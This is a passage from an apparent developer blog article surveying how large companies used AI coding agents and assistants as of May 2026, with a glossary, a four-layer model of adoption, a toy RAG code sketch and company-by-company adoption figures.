&lt;td&gt;Claude Code&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;46%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cursor&lt;/td&gt;
&lt;td&gt;19%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GitHub Copilot&lt;/td&gt;
&lt;td&gt;9%&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The latest SWE-bench Verified numbers tell the same story: Claude Sonnet 4.6 sits at &lt;strong&gt;82.1%&lt;/strong&gt;, while Gemini 3 is at 63.8%, a spread of more than 18 points. Meta's DevMate (covered later) runs on Claude. Reporting suggests even some Google engineers reach for Claude Code internally.&lt;/p&gt;

&lt;p&gt;OpenAI's &lt;strong&gt;Codex&lt;/strong&gt; hit &lt;strong&gt;3 million weekly active users&lt;/strong&gt; by March 2026, so it has the biggest base by raw user count. But the same surveys put it below Claude Code, Cursor, and Copilot when you ask developers what they actually love using. &lt;strong&gt;Wide reach (Codex / ChatGPT)&lt;/strong&gt; and &lt;strong&gt;high agent-quality reputation (Claude Code)&lt;/strong&gt; are running on different metrics in 2026. ChatGPT and Gemini are roughly tied for general-purpose chat, but for coding agents specifically, Claude is clearly out in front.&lt;/p&gt;




&lt;h2&gt;
  
  
  0. Glossary: terms used throughout
&lt;/h2&gt;

&lt;p&gt;Skip this section if you already know all of these. I'm trying to avoid arguments downstream.&lt;/p&gt;

&lt;h3&gt;
  
  
  0.1 The four generations of coding AI
&lt;/h3&gt;

&lt;p&gt;The shape of coding AI has shifted a lot over the past few years. As of May 2026, we're at generation 4.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;Name&lt;/th&gt;
&lt;th&gt;What it does&lt;/th&gt;
&lt;th&gt;Representative tools&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Gen 1&lt;/td&gt;
&lt;td&gt;Code completion&lt;/td&gt;
&lt;td&gt;Suggest the next tokens, accept with Tab&lt;/td&gt;
&lt;td&gt;GitHub Copilot (2021)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen 2&lt;/td&gt;
&lt;td&gt;Chat / inline edits&lt;/td&gt;
&lt;td&gt;Edit multiple files via natural language&lt;/td&gt;
&lt;td&gt;Cursor / Copilot Chat / ChatGPT&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen 3&lt;/td&gt;
&lt;td&gt;Agent&lt;/td&gt;
&lt;td&gt;Take an Issue and produce a PR autonomously&lt;/td&gt;
&lt;td&gt;Claude Code / Codex (OpenAI) / Copilot Coding Agent / Devin&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gen 4&lt;/td&gt;
&lt;td&gt;Multi-agent / autonomous execution&lt;/td&gt;
&lt;td&gt;Run agents in parallel, human approves at key points&lt;/td&gt;
&lt;td&gt;Claude Code Auto Mode / Codex Cloud / Copilot subagent / Minions&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Gen 3 means: hand the agent an Issue or ticket, and it plans, implements, runs tests, and opens a PR. It runs &lt;code&gt;npm install&lt;/code&gt; and &lt;code&gt;pytest&lt;/code&gt; itself. The "internal agents" you'll see throughout this article are mostly Gen 3.&lt;/p&gt;

&lt;p&gt;Gen 4 layers something on top: &lt;strong&gt;one engineer running multiple agents in parallel, only stepping in to approve key decisions&lt;/strong&gt;. That's how Anthropic itself works internally, and it's the direction every company in this article is pushing toward.&lt;/p&gt;

&lt;h3&gt;
  
  
  0.2 Tools by name
&lt;/h3&gt;

&lt;p&gt;Quick orientation on the tools that come up below.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;GitHub Copilot&lt;/strong&gt;: Microsoft / GitHub's AI coding assistant. Started as Gen 1 completion in 2021; in 2026 it has a Gen 3 "Coding Agent" too.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cursor&lt;/strong&gt;: AI-first editor forked from VS Code. The flagship of Gen 2 (chat-driven multi-file editing). Spread fast as the day-to-day editor at Stripe, Shopify, Salesforce, and others.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Claude Code&lt;/strong&gt;: Anthropic's CLI coding agent. The textbook Gen 3 tool: it edits files, runs commands, and runs tests from your terminal.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Codex (OpenAI)&lt;/strong&gt;: OpenAI's coding agent, relaunched in May 2025. Available across ChatGPT, a CLI, a desktop app, and IDE integrations. Runs on GPT-5.5-Codex. &lt;strong&gt;3 million weekly actives as of March 2026&lt;/strong&gt; make its base the largest, but it trails Claude Code in pure coding-quality reputation (more on this later).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Amazon Q Developer&lt;/strong&gt;: AWS's coding/operations AI. Strong at large migrations like Java 8 to Java 17.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;DevMate / Minions / Agentforce&lt;/strong&gt;: internal agents at Meta, Stripe, and Salesforce respectively. Detailed below.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  0.3 MCP (Model Context Protocol)
&lt;/h3&gt;

&lt;p&gt;A protocol Anthropic published at the end of 2024 for &lt;strong&gt;letting LLMs call external tools (your wiki, Slack, Jira, databases, the file system) in a standardized way&lt;/strong&gt;. Think of it as "tool use, open-standardized." Cursor, Claude Code, Copilot, and basically every major tool can read MCP servers now. As of May 2026, "expose our internal tools as MCP servers so the agents can hit them" is a normal weekly task. That's what the opening conversation in this article was referring to.&lt;/p&gt;

&lt;h3&gt;
  
  
  0.4 RAG (Retrieval-Augmented Generation)
&lt;/h3&gt;

&lt;p&gt;The technique for getting an LLM to answer using information it never saw during training (your internal docs, basically). When a question comes in, you retrieve relevant documents first, then pass them along to the LLM. Whenever I write "LLM-ifying internal search," that's what I mean.&lt;/p&gt;
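&lt;p&gt;The loop is small enough to sketch. A toy version (keyword overlap instead of embedding search; the documents and names are made up) that shows the retrieve-then-augment shape:&lt;/p&gt;

```javascript
// Toy RAG: retrieve the most relevant internal doc, then stuff it into
// the prompt. Real systems swap the scoring for embedding similarity.
const docs = [
  { id: 'wiki/oncall', text: 'The on-call rotation is defined in PagerDuty.' },
  { id: 'wiki/deploy', text: 'Deploys go through the staging pipeline first.' },
];

// 1. Retrieve: rank docs by naive term overlap with the question.
function retrieve(question, k = 1) {
  const terms = question.toLowerCase().split(/\W+/).filter(Boolean);
  return docs
    .map((d) => ({
      ...d,
      score: terms.filter((t) => d.text.toLowerCase().includes(t)).length,
    }))
    .sort((a, b) => b.score - a.score)
    .slice(0, k);
}

// 2. Augment: the LLM answers from the retrieved context, not its weights.
function buildPrompt(question) {
  const context = retrieve(question)
    .map((d) => `[${d.id}] ${d.text}`)
    .join('\n');
  return `Answer using only this context:\n${context}\n\nQ: ${question}`;
}

console.log(buildPrompt('how do deploys work?'));
```

&lt;p&gt;Step 2 is the whole trick: the model's context window carries the internal knowledge, so nothing needs retraining.&lt;/p&gt;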

&lt;h3&gt;
  
  
  0.5 Tier 1/2 support
&lt;/h3&gt;

&lt;p&gt;Customer-support shorthand. Tier 1 handles simple FAQ-level questions, Tier 2 needs subject-matter expertise, Tier 3 escalates to engineering. This comes up in the Salesforce section.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. The four layers of "AI use"
&lt;/h2&gt;

&lt;p&gt;People say "AI use" like it's one thing. In practice, what companies are doing splits cleanly into four layers. If you have this map in mind, the rest of the article reads in a straight line.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fue8e09ieik4gtgqlvb8f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fue8e09ieik4gtgqlvb8f.png" alt="ai-use" width="483" height="827"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Most companies are stuck at L1: &lt;strong&gt;Cursor and Claude Code are deployed company-wide, but no organizational number reflects it yet&lt;/strong&gt;. "People are using it daily" is true, but no bridge has been built into L2 (operations) or L3 (customer-facing product). The 11 companies below have all pushed into L2, L3, and even L4. That's the gap.&lt;/p&gt;

&lt;p&gt;From here I walk through each company in shallow-to-deep layer order (L1 first, then L1+L2, then L3, then L4). Every section says up front which layer that company is in.&lt;/p&gt;




&lt;h2&gt;
  
  
  2. Companies pushing hardest at L1
&lt;/h2&gt;

&lt;p&gt;Four companies that have pushed the share of AI-generated code to the extreme.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 Google: 75% of new code is AI-generated
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L1&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;This is the number Sundar Pichai went public with at Google Cloud Next 2026 in April:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;October 2024: ~25% of new code AI-generated&lt;/li&gt;
&lt;li&gt;Fall 2025: 50%&lt;/li&gt;
&lt;li&gt;April 2026: &lt;strong&gt;75%&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;3x in 18 months. Officially, the in-house base model for this is &lt;strong&gt;Gemini 3.1 Pro&lt;/strong&gt;, which engineers use for generation, refactoring, and migrations. "AI-generated" here means "AI-suggested code that humans approved or edited." Every commit still goes through human review and automated tests. AI isn't deploying anything on its own.&lt;/p&gt;

&lt;p&gt;Pichai also pointed at a concrete example: a complex code migration (large internal refactor) that engineers and agents did together finished &lt;strong&gt;6x faster&lt;/strong&gt; than the same kind of work took engineers working alone a year earlier.&lt;/p&gt;

&lt;p&gt;The shape of engineering work is shifting. Less typing. More reviewing and design judgment.&lt;/p&gt;

&lt;h4&gt;
  
  
  But Google's internal reality is a Gemini/Claude two-tier setup
&lt;/h4&gt;

&lt;p&gt;Here's where it gets interesting. Multiple public sources show that &lt;strong&gt;a non-trivial number of Google engineers are actually using Claude Code internally&lt;/strong&gt;.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;On January 3, 2026, &lt;strong&gt;Jaana Dogan, a principal engineer on Google's Gemini API team, posted publicly on X&lt;/strong&gt; that Claude Code reproduced a complex distributed-systems design her team had spent a year on, in &lt;strong&gt;about an hour&lt;/strong&gt;. The post got 5.4M views in 24 hours&lt;/li&gt;
&lt;li&gt;BusinessToday reported in April 2026 that &lt;strong&gt;parts of Google DeepMind have official access to Claude Code&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Steve Yegge (well-known ex-Googler) posted on X, citing anonymous Googler sources, that the company has a &lt;strong&gt;two-tier internal world&lt;/strong&gt;: DeepMind people use Claude, and other engineers get pushed into in-house Gemini-based tools&lt;/li&gt;
&lt;li&gt;Alphabet has announced an investment of up to &lt;strong&gt;$40B in Anthropic&lt;/strong&gt; ($10B cash plus $30B tied to milestones). It reads as Alphabet trying to buy its way into Anthropic's lead on coding agents at the corporate level&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fosr65hw5o9a0g4y85kyd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fosr65hw5o9a0g4y85kyd.png" alt="google" width="399" height="629"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So the "75% AI-generated" claim is real, but &lt;strong&gt;the AI on the other side of that number isn't all Gemini&lt;/strong&gt;. There are clearly engineers reaching for Claude Code inside Google. The shift to review-and-judgment work is happening across the company, but underneath that, a quieter selection process is going on for which model is actually best at the job. That's the May 2026 picture.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.2 Anthropic: "most of the code is written by Claude Code"
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L1&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Anthropic's own internal setup is the most extreme thing publicly documented. Their published material ("How Anthropic teams use Claude Code") says outright that the bulk of internal code is now written by Claude Code itself.&lt;/p&gt;

&lt;p&gt;Engineers' actual jobs have collapsed into three things:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Architecture&lt;/strong&gt;: deciding the overall structure&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Product thinking&lt;/strong&gt;: deciding what to build&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Orchestration&lt;/strong&gt;: running agents in parallel and steering them&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;In practice, one engineer runs several Claude Code agents on separate tasks and reviews the PRs they come back with.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fya6mm69b6n48e26degsb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fya6mm69b6n48e26degsb.png" alt="anthropic" width="585" height="660"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In May 2026, Anthropic shipped &lt;strong&gt;Claude Code Auto Mode&lt;/strong&gt;, which exposes that exact workflow externally. Approval gates stay, but the agent drives the task forward on its own. The human just signs off at key points.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.3 Meta: DevMate is filing about half of all code changes
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L1 and L4&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Meta has been pushing an "AI-Native" stance hard since 2025. In December 2025, Mark Zuckerberg said outright that AI is now "core to how work happens."&lt;/p&gt;

&lt;p&gt;Two main internal tools:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;DevMate&lt;/strong&gt;: an internal coding agent built on Anthropic's Claude&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Metamate&lt;/strong&gt;: a general-purpose assistant for everyone in the company&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The number that stands out, from LinearB's reporting: &lt;strong&gt;DevMate already submits roughly 50% of all code changes at Meta&lt;/strong&gt;. The other 50% is human-written, and both go through review before merging.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwmjyz9cj061x7ndo2r37.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwmjyz9cj061x7ndo2r37.png" alt="meta" width="632" height="358"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The interesting part is that Meta isn't holding itself to its own model (Llama). It's running &lt;strong&gt;Claude and Gemini inside its workflows&lt;/strong&gt;. They've explicitly given up on "only our model" and gone with whichever is best per task.&lt;/p&gt;

&lt;p&gt;Meta has also pushed into L4 (the evaluation layer). The Creation Org, which runs Facebook / WhatsApp / Messenger, set a target for the first half of 2026: &lt;strong&gt;65% of engineers should write 75%+ of their code via AI&lt;/strong&gt;. Meta's PR position is that the metric is "outcomes from AI," not "amount of AI usage." Whether the field reads it that way is another question.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.4 Microsoft / GitHub: Copilot moves from completion to agent
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L1&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;GitHub Copilot changed shape in 2026. One company is now carrying all four generations at once.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftpqpjzti42dfnt0cbtcq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftpqpjzti42dfnt0cbtcq.png" alt="microsoft" width="369" height="576"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The center of the 2026 product is &lt;strong&gt;Copilot Coding Agent&lt;/strong&gt;. Assign it an Issue, and it spins up in an isolated GitHub Actions runner, working only on &lt;code&gt;copilot/*&lt;/code&gt; branches. It can't touch &lt;code&gt;main&lt;/code&gt; or any protected branch. It writes code in that sandbox and ships you a PR.&lt;/p&gt;

&lt;p&gt;In early 2026, Copilot also added a public preview that lets users invoke Anthropic's Claude Agent SDK from inside their Copilot subscription. Copilot users can now drive Claude-backed agents.&lt;/p&gt;

&lt;p&gt;And starting June 2026, Copilot moves to &lt;strong&gt;token-based usage billing&lt;/strong&gt;. Premium Request Units go away in favor of GitHub AI Credits. The product is shifting from "all-you-can-eat IDE helper" to something closer to an API service.&lt;/p&gt;




&lt;h2&gt;
  
  
  3. Companies that turned L1 + L2 into real numbers
&lt;/h2&gt;

&lt;p&gt;Two companies that pushed past developer-side AI (L1) and started showing big numbers in &lt;strong&gt;internal operations (L2)&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Amazon: 4,500 person-years saved with Q Developer
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L1 and L2&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Amazon's internal story is all about modernizing legacy applications.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Number&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Amazon-internal Q Developer queries&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;1M+&lt;/strong&gt; in roughly a year&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Engineering effort saved (internal use)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;4,500 person-years&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cost equivalent&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;$260M+&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hours saved&lt;/td&gt;
&lt;td&gt;450,000+&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Production apps migrated&lt;/td&gt;
&lt;td&gt;tens of thousands&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The actual workload was things like "Java 8 to Java 17": large language/framework upgrades pushed through agents instead of humans. For a company with AWS-scale legacy code, this is the highest-value AI work they could be doing.&lt;/p&gt;

&lt;p&gt;A note on timing: AWS is &lt;strong&gt;stopping new Q Developer signups on May 15, 2026&lt;/strong&gt;, one week after this article was written, and consolidating its coding-AI products under &lt;strong&gt;Kiro&lt;/strong&gt;. The product is shrinking, but the internal payoff (4,500 person-years) is locked in. Still the largest known L2 result so far.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.2 Stripe: Minions merge 1,300+ PRs a week
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L1 and L2&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Stripe's internal coding agent system is called &lt;strong&gt;Minions&lt;/strong&gt;.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;PRs merged per week&lt;/strong&gt;: 1,300+&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Use cases&lt;/strong&gt;: API integration generation, docs, tests, refactors&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Public benchmark&lt;/strong&gt;: Stripe integration benchmark (an agent benchmark that mirrors a production-like API integration setup)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Minions is built around the idea of a "one-shot, end-to-end agent." Instead of letting a human jump in mid-task, it runs from Issue to PR in one go. If it fails, it retries itself. To make this reliable, Stripe wrote its own &lt;strong&gt;agent harness&lt;/strong&gt;: the runtime that handles environment setup, tool exposure, retries, and state, all in one place.&lt;/p&gt;

&lt;p&gt;For day-to-day editor use, Stripe's adoption of Cursor went from &lt;strong&gt;single-digit percent to over 80% in a short window&lt;/strong&gt;, per co-founder Patrick Collison (it's quoted on Cursor's own customer page). Stripe has roughly 3,000 engineers, so that's at least 2,400 people now coding daily in Cursor.&lt;/p&gt;




&lt;h2&gt;
  
  
  4. Companies that put AI into the customer-facing product
&lt;/h2&gt;

&lt;p&gt;L1 and L2 are still inside the org. From here, &lt;strong&gt;the product itself starts being run by AI&lt;/strong&gt; (L3).&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 Salesforce: Agentforce saved $100M internally and put 18k engineers on Cursor
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L3 and L1&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Salesforce's AI agent platform is &lt;strong&gt;Agentforce&lt;/strong&gt;. Internally, they pointed it at &lt;strong&gt;their own customer support&lt;/strong&gt; first. The numbers Fortune put in print:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Customer conversations handled (internal use): &lt;strong&gt;3 million&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Cost reduction: &lt;strong&gt;$100M+&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Sales opportunities influenced: 3,200+&lt;/li&gt;
&lt;li&gt;Paid Agentforce deals as of March 2026: 6,000+&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Mechanically: a customer hits Agentforce in natural language, and it answers and updates records by reading the knowledge base and the CRM. Only the cases it can't resolve get escalated.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F95iy49bufkezucfup7ni.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F95iy49bufkezucfup7ni.png" alt="salesforce" width="800" height="365"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The whole design has shifted: &lt;strong&gt;AI handles Tier 1/2 autonomously, humans only see the complex cases&lt;/strong&gt;. AI isn't sitting alongside the human anymore. It's the first responder.&lt;/p&gt;

&lt;p&gt;On the developer side, Salesforce moved &lt;strong&gt;90% of its 20,000 engineers onto Cursor&lt;/strong&gt; (per Cursor's own numbers). After rollout, the company says cycle time, PR velocity, and code quality each improved by double digits. So they're hitting both L1 and L3 hard.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.2 Netflix: rebuilding the recommender on Large Foundation Models
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L3&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Netflix is interesting less for coding and more as an example of AI inside the product core.&lt;/p&gt;

&lt;p&gt;The direction they laid out at the &lt;strong&gt;Personalization, Recommendation and Search Workshop (PRS 2025)&lt;/strong&gt; in May 2025: replace the existing recommender with one built on &lt;strong&gt;Large Foundation Models (LFMs)&lt;/strong&gt;. LFMs are internet-scale pretrained models in the same family as the things behind ChatGPT.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1llpnztwvse59ksysh8c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1llpnztwvse59ksysh8c.png" alt="netflix" width="746" height="730"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Concretely, you'll be able to say "something light and funny under 90 minutes for a Friday night" in plain language, and the system will interpret that and serve the right suggestions. This is the conversational recommender direction. The recommendation cards and search bar move toward a chat-style UI.&lt;/p&gt;

&lt;p&gt;Netflix has also been open about cost. They use a two-stage training setup: first stage pretrains a policy without specific reward optimization, second stage adds engineered proxy rewards. Pre-processing and model-training pipeline volume came down by &lt;strong&gt;about 70%&lt;/strong&gt;. "How to run AI cost-efficiently" is going to be the next axis of competition.&lt;/p&gt;




&lt;h2&gt;
  
  
  5. Companies that pushed AI into the org itself (L4)
&lt;/h2&gt;

&lt;p&gt;The last layer. &lt;strong&gt;Embedding AI into evaluation criteria and org design itself&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  5.1 Shopify: Reflexive AI usage as a baseline expectation
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L4 (and L1 across the board)&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The internal memo Tobi Lütke (Shopify CEO) sent in April 2025 is the canonical example of this layer. He posted it publicly himself, so it's not really an internal memo anymore.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Reflexive AI usage is now a baseline expectation at Shopify."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;What that actually does to day-to-day work:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxp2adicg5urz1zogl1r2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxp2adicg5urz1zogl1r2.png" alt="shopify" width="519" height="1173"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Three concrete things this implies:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Before requesting any new headcount, you have to document &lt;strong&gt;why AI can't do this job&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Product designers are required to use AI for &lt;strong&gt;all&lt;/strong&gt; new feature prototypes&lt;/li&gt;
&lt;li&gt;AI use is part of &lt;strong&gt;performance reviews&lt;/strong&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This is the textbook L4 move. Lütke wrote it for the outside world, on purpose, and the framing has been picked up explicitly in moves at Meta and Mercari. "Can you actually use AI" has been promoted to a baseline engineering skill.&lt;/p&gt;




&lt;h2&gt;
  
  
  6. Japan: Mercari and CyberAgent
&lt;/h2&gt;

&lt;p&gt;Two Japanese companies that are far enough out front to deserve their own section. They both span L1 to L4, so I'm grouping them by country rather than by layer.&lt;/p&gt;

&lt;h3&gt;
  
  
  6.1 Mercari: AI-Native at 95% adoption, plus the ASDD methodology
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L1 to L4 (everything)&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Mercari's numbers are out in the open on their engineering blog.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Number&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Employee AI-tool usage&lt;/td&gt;
&lt;td&gt;95%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AI-generated code share in product dev&lt;/td&gt;
